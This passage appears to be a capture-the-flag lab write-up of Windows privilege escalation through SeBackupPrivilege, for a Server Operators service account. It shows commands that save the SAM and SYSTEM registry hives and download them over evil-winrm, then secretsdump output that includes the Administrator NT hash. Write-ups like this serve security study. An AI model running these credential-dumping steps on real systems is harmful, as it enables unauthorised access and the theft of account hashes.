SeBackupPrivilege / SeRestorePrivilege
I discovered that the svc-printer user has both SeBackupPrivilege and SeRestorePrivilege enabled. Those privileges can be abused for privilege escalation.
Both SeBackupPrivilege and SeRestorePrivilege are, by default, inherited from membership in the Server Operators group in an Active Directory environment, along with a few other privileges that aren't relevant for this privilege escalation.
This was somewhat predicted in the earlier stage of the operation, as I already knew that the svc-printer user is a member of the Server Operators group.
Essentially, SeBackupPrivilege lets a process read any file or registry hive regardless of its ACL (when the handle is opened with backup semantics), and SeRestorePrivilege lets it write any file regardless of its ACL. Together they amount to read/write access to EVERY FILE on the system.
*evil-winrm* ps c:\tmp> cmd /c reg save HKLM\SAM sam
The operation completed successfully.
*evil-winrm* ps c:\tmp> cmd /c reg save HKLM\SYSTEM system
The operation completed successfully.
I can exploit this by simply saving the SAM and SYSTEM hives with reg save. The hive files under C:\Windows\System32\config are normally locked and ACL-protected, but reg save goes through the registry API with backup semantics, which only requires SeBackupPrivilege, so the copies land in C:\tmp without any administrative rights.
*evil-winrm* ps c:\tmp> download C:\tmp\sam sam
info: Downloading C:\tmp\sam to sam
info: Download successful!
*evil-winrm* ps c:\tmp> download C:\tmp\system system
info: Downloading C:\tmp\system to system
info: Download successful!
Then I can transfer those two files to Kali using evil-winrm's built-in download command in the existing session.
Hashdump
┌──(kali㉿kali)-[~/…/htb/labs/return/hashdump]
└─$ impacket-secretsdump LOCAL -sam sam -system system -outputfile hashdump
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
I can then dump the credential hashes offline using impacket-secretsdump in LOCAL mode: it derives the bootkey from the SYSTEM hive and uses it to decrypt the hashes stored in the SAM hive, so nothing further has to run on the target. The LM field (aad3b435b51404eeaad3b435b51404ee) is the empty LM hash, meaning LM storage is disabled; the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 on Guest and DefaultAccount is the hash of an empty password, so the only usable credential here is the local Administrator's NT hash. The WDAGUtilityAccount message is expected, as that account carries no hash data. Keep in mind the SAM only contains local accounts; domain account hashes live in NTDS.dit on the domain controller, not in this hive.